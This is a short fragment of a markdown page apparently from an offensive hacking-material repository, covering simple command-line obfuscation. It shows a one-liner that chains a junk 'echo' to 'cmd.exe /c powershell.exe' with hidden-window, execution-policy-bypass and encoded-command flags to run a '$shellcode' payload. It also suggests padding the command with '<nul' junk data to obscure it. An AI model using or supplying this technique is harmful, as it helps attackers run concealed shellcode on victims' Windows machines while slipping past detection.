r00t-3xp10it/hacking-material-books/obfuscation/simple_obfuscation.md

 ![pipe commands](http://i66.tinypic.com/2lcbseo.jpg)

+      HINT: using [ || ] allow us to execute the 2º command if the 1º one fails to execute echo "rubish data" || cmd.exe /c powershell.exe -nop -wind hidden -Exec Bypass -noni -enc $shellcode

 ---

       Using a batch redirection caret (<nul) to add a extra layer of rubish data into our oneliner.